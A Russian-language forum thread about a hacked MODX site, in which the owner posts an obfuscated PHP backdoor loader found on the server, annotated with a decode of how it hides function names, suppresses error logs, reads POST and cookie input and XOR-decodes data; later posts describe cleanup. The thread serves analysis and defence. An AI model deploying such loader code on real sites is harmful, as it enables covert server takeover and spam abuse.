Взламывают сайт на MODX


RAPCorp

Всем привет. Недавно столкнулся с такой проблемой: ломали MODX Evo. Перешёл на последнюю версию MODX Revo. Сначала скидывали файлы для генерации дорвеев, а потом начали рассылать почту — запарился очередь писем чистить, по 10к в очереди доходило. Не могу антивирусами обнаружить этот вирусняк: файлы каждый раз называют по-разному, а ещё изменяли .htaccess, добавляя пинги роботам Google, Bing и т.д.

inc.php
Код:
<?php
// NOTE(review): obfuscated PHP found on a compromised MODX install, posted for analysis.
// The code is kept byte-identical so that file hashes and AV/IOC signatures still match;
// do NOT execute it. The comments are a manual decode of the obfuscation: every identifier
// and every string below is assembled one character at a time from the lookup table
// $GLOBALS['m3d706']. Detection hint: a hex-escaped "GLOBALS" (`${"\x47\x4c\x4fB\x41\x4c\x53"}`)
// followed by a long hex-escaped table is the fingerprint of this obfuscator style.
//
// "\x47\x4c\x4fB\x41\x4c\x53" == "GLOBALS"; the value is a 98-character lookup table.
${"\x47\x4c\x4fB\x41\x4c\x53"}['m3d706'] = "\x2c\x2e\x55\x34\x5f\x76\x77\x56\x4f\x7a\x2b\x4b\x35\x6a\x30\x26\x71\x7b\x5e\x32\x47\x9\x3e\x5c\x21\x70\x7c\x44\x5d\x7e\x58\x69\x63\x75\x45\x24\x49\x4c\x7d\x3d\x29\x64\x59\x62\x73\x27\x51\x4d\x66\x74\x6c\x4a\x41\x2f\x22\x2d\x53\x60\x3b\x4e\x6e\x67\x3f\x2a\x36\x54\x68\x33\x6d\x46\x39\x52\x6b\x78\x3a\x23\x37\x65\x43\x40\x5b\xa\x48\x61\x3c\x20\x31\x72\x79\xd\x42\x28\x50\x25\x6f\x38\x57\x5a";
// $GLOBALS['v8c19bb5a'] = 'chr'   (used by rf7c below)
$GLOBALS[$GLOBALS['m3d706'][5].$GLOBALS['m3d706'][95].$GLOBALS['m3d706'][32].$GLOBALS['m3d706'][86].$GLOBALS['m3d706'][70].$GLOBALS['m3d706'][43].$GLOBALS['m3d706'][43].$GLOBALS['m3d706'][12].$GLOBALS['m3d706'][83]] = $GLOBALS['m3d706'][32].$GLOBALS['m3d706'][66].$GLOBALS['m3d706'][87];
// $GLOBALS['we37f76'] = 'ord'     (used by rf7c below)
$GLOBALS[$GLOBALS['m3d706'][6].$GLOBALS['m3d706'][77].$GLOBALS['m3d706'][67].$GLOBALS['m3d706'][76].$GLOBALS['m3d706'][48].$GLOBALS['m3d706'][76].$GLOBALS['m3d706'][64]] = $GLOBALS['m3d706'][94].$GLOBALS['m3d706'][87].$GLOBALS['m3d706'][41];
// $GLOBALS['h637ff6'] = 'strlen'  (used by rf7c below)
$GLOBALS[$GLOBALS['m3d706'][66].$GLOBALS['m3d706'][64].$GLOBALS['m3d706'][67].$GLOBALS['m3d706'][76].$GLOBALS['m3d706'][48].$GLOBALS['m3d706'][48].$GLOBALS['m3d706'][64]] = $GLOBALS['m3d706'][44].$GLOBALS['m3d706'][49].$GLOBALS['m3d706'][87].$GLOBALS['m3d706'][50].$GLOBALS['m3d706'][77].$GLOBALS['m3d706'][60];
// $GLOBALS['s164'] = 'ini_set'
$GLOBALS[$GLOBALS['m3d706'][44].$GLOBALS['m3d706'][86].$GLOBALS['m3d706'][64].$GLOBALS['m3d706'][3]] = $GLOBALS['m3d706'][31].$GLOBALS['m3d706'][60].$GLOBALS['m3d706'][31].$GLOBALS['m3d706'][4].$GLOBALS['m3d706'][44].$GLOBALS['m3d706'][77].$GLOBALS['m3d706'][49];
// $GLOBALS['vecc207'] = 'serialize'
$GLOBALS[$GLOBALS['m3d706'][5].$GLOBALS['m3d706'][77].$GLOBALS['m3d706'][32].$GLOBALS['m3d706'][32].$GLOBALS['m3d706'][19].$GLOBALS['m3d706'][14].$GLOBALS['m3d706'][76]] = $GLOBALS['m3d706'][44].$GLOBALS['m3d706'][77].$GLOBALS['m3d706'][87].$GLOBALS['m3d706'][31].$GLOBALS['m3d706'][83].$GLOBALS['m3d706'][50].$GLOBALS['m3d706'][31].$GLOBALS['m3d706'][9].$GLOBALS['m3d706'][77];
// $GLOBALS['kb645d'] = 'phpversion'
$GLOBALS[$GLOBALS['m3d706'][72].$GLOBALS['m3d706'][43].$GLOBALS['m3d706'][64].$GLOBALS['m3d706'][3].$GLOBALS['m3d706'][12].$GLOBALS['m3d706'][41]] = $GLOBALS['m3d706'][25].$GLOBALS['m3d706'][66].$GLOBALS['m3d706'][25].$GLOBALS['m3d706'][5].$GLOBALS['m3d706'][77].$GLOBALS['m3d706'][87].$GLOBALS['m3d706'][44].$GLOBALS['m3d706'][31].$GLOBALS['m3d706'][94].$GLOBALS['m3d706'][60];
// $GLOBALS['k08703985'] = 'unserialize'  -- unserialize() on attacker-supplied data is
// the classic PHP object-injection / RCE primitive; its call site is not in the visible fragment.
$GLOBALS[$GLOBALS['m3d706'][72].$GLOBALS['m3d706'][14].$GLOBALS['m3d706'][95].$GLOBALS['m3d706'][76].$GLOBALS['m3d706'][14].$GLOBALS['m3d706'][67].$GLOBALS['m3d706'][70].$GLOBALS['m3d706'][95].$GLOBALS['m3d706'][12]] = $GLOBALS['m3d706'][33].$GLOBALS['m3d706'][60].$GLOBALS['m3d706'][44].$GLOBALS['m3d706'][77].$GLOBALS['m3d706'][87].$GLOBALS['m3d706'][31].$GLOBALS['m3d706'][83].$GLOBALS['m3d706'][50].$GLOBALS['m3d706'][31].$GLOBALS['m3d706'][9].$GLOBALS['m3d706'][77];
// $GLOBALS['r68dee'] = 'base64_decode'
$GLOBALS[$GLOBALS['m3d706'][87].$GLOBALS['m3d706'][64].$GLOBALS['m3d706'][95].$GLOBALS['m3d706'][41].$GLOBALS['m3d706'][77].$GLOBALS['m3d706'][77]] = $GLOBALS['m3d706'][43].$GLOBALS['m3d706'][83].$GLOBALS['m3d706'][44].$GLOBALS['m3d706'][77].$GLOBALS['m3d706'][64].$GLOBALS['m3d706'][3].$GLOBALS['m3d706'][4].$GLOBALS['m3d706'][41].$GLOBALS['m3d706'][77].$GLOBALS['m3d706'][32].$GLOBALS['m3d706'][94].$GLOBALS['m3d706'][41].$GLOBALS['m3d706'][77];
// $GLOBALS['m1e07e5'] = 'set_time_limit'
$GLOBALS[$GLOBALS['m3d706'][68].$GLOBALS['m3d706'][86].$GLOBALS['m3d706'][77].$GLOBALS['m3d706'][14].$GLOBALS['m3d706'][76].$GLOBALS['m3d706'][77].$GLOBALS['m3d706'][12]] = $GLOBALS['m3d706'][44].$GLOBALS['m3d706'][77].$GLOBALS['m3d706'][49].$GLOBALS['m3d706'][4].$GLOBALS['m3d706'][49].$GLOBALS['m3d706'][31].$GLOBALS['m3d706'][68].$GLOBALS['m3d706'][77].$GLOBALS['m3d706'][4].$GLOBALS['m3d706'][50].$GLOBALS['m3d706'][31].$GLOBALS['m3d706'][68].$GLOBALS['m3d706'][31].$GLOBALS['m3d706'][49];
// $GLOBALS['p5ec0'] = 'sba4'  -- another obfuscated identifier; whatever 'sba4' names is
// not defined in the visible fragment (the listing is truncated below rf7c).
$GLOBALS[$GLOBALS['m3d706'][25].$GLOBALS['m3d706'][12].$GLOBALS['m3d706'][77].$GLOBALS['m3d706'][32].$GLOBALS['m3d706'][14]] = $GLOBALS['m3d706'][44].$GLOBALS['m3d706'][43].$GLOBALS['m3d706'][83].$GLOBALS['m3d706'][3];
// $GLOBALS['z99fb'] = 'rf7c'  -- the name of the XOR routine defined further down,
// stored so it can be invoked indirectly as $GLOBALS['z99fb'](...).
$GLOBALS[$GLOBALS['m3d706'][9].$GLOBALS['m3d706'][70].$GLOBALS['m3d706'][70].$GLOBALS['m3d706'][48].$GLOBALS['m3d706'][43]] = $GLOBALS['m3d706'][87].$GLOBALS['m3d706'][48].$GLOBALS['m3d706'][76].$GLOBALS['m3d706'][32];
// $GLOBALS['o5842c141'] = $_POST   -- attacker-controlled input channel #1
$GLOBALS[$GLOBALS['m3d706'][94].$GLOBALS['m3d706'][12].$GLOBALS['m3d706'][95].$GLOBALS['m3d706'][3].$GLOBALS['m3d706'][19].$GLOBALS['m3d706'][32].$GLOBALS['m3d706'][86].$GLOBALS['m3d706'][3].$GLOBALS['m3d706'][86]] = $_POST;
// $GLOBALS['lda08'] = $_COOKIE     -- attacker-controlled input channel #2 (cookies are
// rarely logged in full by web servers, which makes this channel harder to spot in access logs)
$GLOBALS[$GLOBALS['m3d706'][50].$GLOBALS['m3d706'][41].$GLOBALS['m3d706'][83].$GLOBALS['m3d706'][14].$GLOBALS['m3d706'][95]] = $_COOKIE;
// @ini_set('error_log', NULL)
@$GLOBALS[$GLOBALS['m3d706'][44].$GLOBALS['m3d706'][86].$GLOBALS['m3d706'][64].$GLOBALS['m3d706'][3]]($GLOBALS['m3d706'][77].$GLOBALS['m3d706'][87].$GLOBALS['m3d706'][87].$GLOBALS['m3d706'][94].$GLOBALS['m3d706'][87].$GLOBALS['m3d706'][4].$GLOBALS['m3d706'][50].$GLOBALS['m3d706'][94].$GLOBALS['m3d706'][61], NULL);
// @ini_set('log_errors', 0)  -- together with the line above this keeps PHP errors
// out of the server log (anti-forensics).
@$GLOBALS[$GLOBALS['m3d706'][44].$GLOBALS['m3d706'][86].$GLOBALS['m3d706'][64].$GLOBALS['m3d706'][3]]($GLOBALS['m3d706'][50].$GLOBALS['m3d706'][94].$GLOBALS['m3d706'][61].$GLOBALS['m3d706'][4].$GLOBALS['m3d706'][77].$GLOBALS['m3d706'][87].$GLOBALS['m3d706'][87].$GLOBALS['m3d706'][94].$GLOBALS['m3d706'][87].$GLOBALS['m3d706'][44], 0);
// @ini_set('max_execution_time', 0)
@$GLOBALS[$GLOBALS['m3d706'][44].$GLOBALS['m3d706'][86].$GLOBALS['m3d706'][64].$GLOBALS['m3d706'][3]]($GLOBALS['m3d706'][68].$GLOBALS['m3d706'][83].$GLOBALS['m3d706'][73].$GLOBALS['m3d706'][4].$GLOBALS['m3d706'][77].$GLOBALS['m3d706'][73].$GLOBALS['m3d706'][77].$GLOBALS['m3d706'][32].$GLOBALS['m3d706'][33].$GLOBALS['m3d706'][49].$GLOBALS['m3d706'][31].$GLOBALS['m3d706'][94].$GLOBALS['m3d706'][60].$GLOBALS['m3d706'][4].$GLOBALS['m3d706'][49].$GLOBALS['m3d706'][31].$GLOBALS['m3d706'][68].$GLOBALS['m3d706'][77], 0);
// @set_time_limit(0)  -- no runtime cap, consistent with long-running mail-sending loops
@$GLOBALS[$GLOBALS['m3d706'][68].$GLOBALS['m3d706'][86].$GLOBALS['m3d706'][77].$GLOBALS['m3d706'][14].$GLOBALS['m3d706'][76].$GLOBALS['m3d706'][77].$GLOBALS['m3d706'][12]](0);

// Placeholders initialised to NULL; $l2b6 is also reused as rf7c's data parameter name.
// How $d11bdb1 is used is not visible in this fragment.
$l2b6 = NULL;
$d11bdb1 = NULL;

// $GLOBALS['w4ac6d1cf'] = '818e6fc5-9ba6-47ad-875f-823984106517'
// A UUID-formatted constant. NOTE(review): presumably the per-install key handed to rf7c
// (or a campaign/instance ID); the code that consumes it is outside the visible fragment,
// so treat that as an assumption. The literal string is a usable IOC for grep/YARA.
$GLOBALS[$GLOBALS['m3d706'][6].$GLOBALS['m3d706'][3].$GLOBALS['m3d706'][83].$GLOBALS['m3d706'][32].$GLOBALS['m3d706'][64].$GLOBALS['m3d706'][41].$GLOBALS['m3d706'][86].$GLOBALS['m3d706'][32].$GLOBALS['m3d706'][48]] = $GLOBALS['m3d706'][95].$GLOBALS['m3d706'][86].$GLOBALS['m3d706'][95].$GLOBALS['m3d706'][77].$GLOBALS['m3d706'][64].$GLOBALS['m3d706'][48].$GLOBALS['m3d706'][32].$GLOBALS['m3d706'][12].$GLOBALS['m3d706'][55].$GLOBALS['m3d706'][70].$GLOBALS['m3d706'][43].$GLOBALS['m3d706'][83].$GLOBALS['m3d706'][64].$GLOBALS['m3d706'][55].$GLOBALS['m3d706'][3].$GLOBALS['m3d706'][76].$GLOBALS['m3d706'][83].$GLOBALS['m3d706'][41].$GLOBALS['m3d706'][55].$GLOBALS['m3d706'][95].$GLOBALS['m3d706'][76].$GLOBALS['m3d706'][12].$GLOBALS['m3d706'][48].$GLOBALS['m3d706'][55].$GLOBALS['m3d706'][95].$GLOBALS['m3d706'][19].$GLOBALS['m3d706'][67].$GLOBALS['m3d706'][70].$GLOBALS['m3d706'][95].$GLOBALS['m3d706'][3].$GLOBALS['m3d706'][86].$GLOBALS['m3d706'][14].$GLOBALS['m3d706'][64].$GLOBALS['m3d706'][12].$GLOBALS['m3d706'][86].$GLOBALS['m3d706'][76];
// Binds $w4ac6d1cf to the global slot assigned just above, so the same name resolves
// even if this file is include()d from inside a function.
global $w4ac6d1cf;

/**
 * Repeating-key XOR (de)obfuscation routine used by the loader above.
 *
 * NOTE(review): kept byte-identical as a malware sample; do not execute.
 * Via the aliases built at the top of the file,
 *   $GLOBALS['h637ff6']  == 'strlen',
 *   $GLOBALS['v8c19bb5a'] == 'chr',
 *   $GLOBALS['we37f76']  == 'ord',
 * so the body reduces to:  out[i] = chr(ord(data[i]) ^ ord(key[i % strlen(key)])).
 * XOR is symmetric, so the same function both encodes and decodes. With an empty key
 * the inner loop never runs and the outer loop spins forever (strlen(key) == 0).
 *
 * @param string $l2b6   data to transform
 * @param string $wba4e0 key, cycled over the data
 * @return string        data XOR-ed with the repeating key, same length as $l2b6
 */
function rf7c($l2b6, $wba4e0)
{
    $f96d = "";

    // Outer loop walks the data; the index is advanced only by the inner loop.
    for ($jb747f=0; $jb747f<$GLOBALS[$GLOBALS['m3d706'][66].$GLOBALS['m3d706'][64].$GLOBALS['m3d706'][67].$GLOBALS['m3d706'][76].$GLOBALS['m3d706'][48].$GLOBALS['m3d706'][48].$GLOBALS['m3d706'][64]]($l2b6);)
    {
        // Inner loop walks one full pass of the key (or stops early at end of data),
        // so the key is effectively repeated across the data.
        for ($l1513=0; $l1513<$GLOBALS[$GLOBALS['m3d706'][66].$GLOBALS['m3d706'][64].$GLOBALS['m3d706'][67].$GLOBALS['m3d706'][76].$GLOBALS['m3d706'][48].$GLOBALS['m3d706'][48].$GLOBALS['m3d706'][64]]($wba4e0) && $jb747f<$GLOBALS[$GLOBALS['m3d706'][66].$GLOBALS['m3d706'][64].$GLOBALS['m3d706'][67].$GLOBALS['m3d706'][76].$GLOBALS['m3d706'][48].$GLOBALS['m3d706'][48].$GLOBALS['m3d706'][64]]($l2b6); $l1513++, $jb747f++)
        {
            // chr(ord(data[i]) ^ ord(key[j]))
            $f96d .= $GLOBALS[$GLOBALS['m3d706'][5].$GLOBALS['m3d706'][95].$GLOBALS['m3d706'][32].$GLOBALS['m3d706'][86].$GLOBALS['m3d706'][70].$GLOBALS['m3d706'][43].$GLOBALS['m3d706'][43].$GLOBALS['m3d706'][12].$GLOBALS['m3d706'][83]]($GLOBALS[$GLOBALS['m3d706'][6].$GLOBALS['m3d706'][77].$GLOBALS['m3d706'][67].$GLOBALS['m3d706'][76].$GLOBALS['m3d706'][48].$GLOBALS['m3d706'][76].$GLOBALS['m3d706'][64]]($l2b6[$jb747f]) ^ $GLOBALS[$GLOBALS['m3d706'][6].$GLOBALS['m3d706'][77].$GLOBALS['m3d706'][67].$GLOBALS['m3d706'][76].$GLOBALS['m3d706'][48].$GLOBALS['m3d706'][76].$GLOBALS['m3d706'][64]]($wba4e0[$l1513]));
        }
    }

    return $f96d;
}
..............................

Вот содержимое этих помойных файлов. Судя по видимому фрагменту, это не «вирус», а обфусцированный PHP-загрузчик: имена функций (ini_set, set_time_limit, base64_decode, unserialize и др.) он собирает посимвольно из таблицы `$GLOBALS['m3d706']`, отключает логирование ошибок, берёт данные из `$_POST` и `$_COOKIE` и определяет XOR-функцию `rf7c`; та часть, где эти данные расшифровываются и используются, в листинг не попала (обрезано ниже). Что-то мне подсказывает, что это кто-то с форума :)
 

RAPCorp

В общем, проблема решилась тривиальным способом. Просканировал сайт AI-Bolit на предмет вирусов — вылетело 27 сообщений с указанием путей к файлам. Почистил всё основательно, в админке поменял пароли, также поменял пароли к БД, ну и, естественно, сам движок обновил до самой актуальной версии — в итоге проблема решилась. Отмечу, что сам вектор первоначального проникновения в теме так и не установлен, поэтому после чистки стоит ещё раз проверить .htaccess (его, как писал выше, тоже правили) и через некоторое время повторить сканирование.
 

bork75

На Серче есть тема «Общая тема о борьбе с шеллами и вирусами на сайте» — там много полезного по защите сайта.
 